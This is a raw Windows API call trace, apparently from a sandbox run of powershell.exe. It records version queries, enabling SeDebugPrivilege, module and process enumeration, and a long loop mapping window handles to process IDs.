	[0884.820] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24dfb8, puLen=0x24dfb0 | out: lplpBuffer=0x24dfb8*=0x2b9733c, puLen=0x24dfb0) returned 1
	[0884.821] CoTaskMemAlloc (cb=0x204) returned 0x3e1f00
	[0884.821] VerLanguageNameW (in: wLang=0x0, szLang=0x3e1f00, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0884.823] CoTaskMemFree (pv=0x3e1f00) 
	[0884.823] VerQueryValueW (in: pBlock=0x2b972a0, lpSubBlock="\\", lplpBuffer=0x24e008, puLen=0x24e000 | out: lplpBuffer=0x24e008*=0x2b972c8, puLen=0x24e000) returned 1
	[0884.828] GetCurrentProcessId () returned 0x196c
	[0885.278] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24cf30 | out: lpLuid=0x24cf30*(LowPart=0x14, HighPart=0)) returned 1
	[0885.281] GetCurrentProcess () returned 0xffffffffffffffff
	[0885.282] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24cf50 | out: TokenHandle=0x24cf50*=0x2b8) returned 1
	[0885.283] AdjustTokenPrivileges (in: TokenHandle=0x2b8, DisableAllPrivileges=0, NewState=0x2b9ab18*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0885.284] CloseHandle (hObject=0x2b8) returned 1
	[0885.288] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x196c) returned 0x2b8
	[0885.299] EnumProcessModules (in: hProcess=0x2b8, lphModule=0x2b9ab80, cb=0x200, lpcbNeeded=0x24df68 | out: lphModule=0x2b9ab80, lpcbNeeded=0x24df68) returned 1
	[0885.301] GetModuleInformation (in: hProcess=0x2b8, hModule=0x13f370000, lpmodinfo=0x2b9adf0, cb=0x18 | out: lpmodinfo=0x2b9adf0*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0885.302] CoTaskMemAlloc (cb=0x804) returned 0x447b70
	[0885.302] GetModuleBaseNameW (in: hProcess=0x2b8, hModule=0x13f370000, lpBaseName=0x447b70, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0885.302] CoTaskMemFree (pv=0x447b70) 
	[0885.303] CoTaskMemAlloc (cb=0x804) returned 0x447b70
	[0885.303] GetModuleFileNameExW (in: hProcess=0x2b8, hModule=0x13f370000, lpFilename=0x447b70, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0885.303] CoTaskMemFree (pv=0x447b70) 
	[0885.304] CloseHandle (hObject=0x2b8) returned 1
	[0885.312] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x196c) returned 0x2b8
	[0885.313] GetExitCodeProcess (in: hProcess=0x2b8, lpExitCode=0x24e098 | out: lpExitCode=0x24e098*=0x103) returned 1
	[0885.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b9b088, Length=0x20000, ResultLength=0x24e060 | out: SystemInformation=0x12b9b088, ResultLength=0x24e060*=0x48db0) returned 0xc0000004
	[0885.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12bbb0b8, Length=0x4b5b0, ResultLength=0x24e060 | out: SystemInformation=0x12bbb0b8, ResultLength=0x24e060*=0x48db0) returned 0x0
	[0886.434] EnumWindows (lpEnumFunc=0x29366ac, lParam=0x0) 
	[0886.436] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.436] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x558
	[0886.436] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.436] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.436] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.436] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x538
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x778
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x778
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.437] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x460
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4d0
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2440
	[0886.438] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x24d8
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1aa4
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1ff0
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1a84
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1fb0
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1e10
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x23a8
	[0886.439] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1f24
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x21ec
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2320
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1fd4
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1880
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b18
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1d6c
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x233c
	[0886.440] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2368
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2124
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x22f0
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x22ac
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1cdc
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10f0
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1f18
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x20a8
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2004
	[0886.441] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1f88
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1f84
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x2050
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1e04
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1ecc
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1e64
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b58
	[0886.442] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1e94
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1e28
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1df8
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1da8
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1c70
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x163c
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1a10
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x186c
	[0886.443] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1d74
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x4c8
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1960
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1ce4
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b24
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14e0
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x17f0
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x854
	[0886.444] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1268
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x1094e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1624
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x1094c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b9c
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x1094a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16f4
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x10948, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x145c
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x1093e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x17d0
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x206ba, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1d28
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x1093a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcb8
	[0886.445] GetWindowThreadProcessId (in: hWnd=0x20614, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1190
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x2041c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x3a8
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x20420, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bd0
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x304c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bfc
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x108b8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1a78
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x108b2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b90
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x108ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b04
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x108a0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b34
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x1088e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1b64
	[0886.446] GetWindowThreadProcessId (in: hWnd=0x1087c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1bb0
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x204f6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1acc
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x1083e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1a2c
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x2042c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x19a8
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x10836, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1944
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x10826, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18c8
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x10822, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18ac
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x1081e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x18ec
	[0886.447] GetWindowThreadProcessId (in: hWnd=0x1081a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1898
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x10810, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc98
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x1080a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x153c
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x10806, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1808
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x10790, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12a4
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x1078e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1740
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x10784, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16c4
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x107c2, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1820
	[0886.448] GetWindowThreadProcessId (in: hWnd=0x107b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16ac
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x1079a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1858
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x1077e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1664
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x10778, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10b4
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x10774, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10ac
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x20378, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10ec
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x10766, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1068
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x10762, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x17e0
	[0886.449] GetWindowThreadProcessId (in: hWnd=0x1075e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x102c
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x1075a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x17a4
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x2035a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1050
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x1072c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1694
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x1071e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1770
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x10710, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1720
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x10702, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x165c
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x106ca, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1578
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x204a6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x16c0
	[0886.450] GetWindowThreadProcessId (in: hWnd=0x106c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x161c
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x106c0, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1638
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x20362, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x15c8
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x106be, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1554
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x106bc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1674
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x106b4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1520
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x1068e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14bc
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x1067e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xf8c
	[0886.451] GetWindowThreadProcessId (in: hWnd=0x1066e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe9c
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x1065e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1434
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x1064e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x14ec
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x1063e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xfcc
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x1062e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12ac
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x1062a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1484
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x10626, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x934
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x10622, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc0c
	[0886.452] GetWindowThreadProcessId (in: hWnd=0x1061c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xb08
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x10610, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x948
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x1060c, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1178
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x105fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13e0
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x105ea, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xcd0
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x105da, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x13fc
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x105c6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdc8
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x105b6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc18
	[0886.453] GetWindowThreadProcessId (in: hWnd=0x105a6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xc2c
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x10580, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xa1c
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x10578, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1244
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x10574, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xdb0
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x20356, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1398
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x10566, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1358
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x10562, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1370
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x1055e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1340
	[0886.454] GetWindowThreadProcessId (in: hWnd=0x10558, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x130c
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x10550, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12c0
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x2053a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x12e4
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x1051a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1270
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x1050a, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1298
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x104fa, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x120c
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x204d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x122c
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x104ce, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11c4
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x202d6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x11b0
	[0886.455] GetWindowThreadProcessId (in: hWnd=0x104c8, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1188
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x104c4, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1148
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x202e6, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x1160
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x30272, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x10fc
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x104bc, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xe34
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x104ac, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0xea4
	[0886.456] GetWindowThreadProcessId (in: hWnd=0x1048e, lpdwProcessId=0x24ddc0 | out: lpdwProcessId=0x24ddc0) returned 0x514
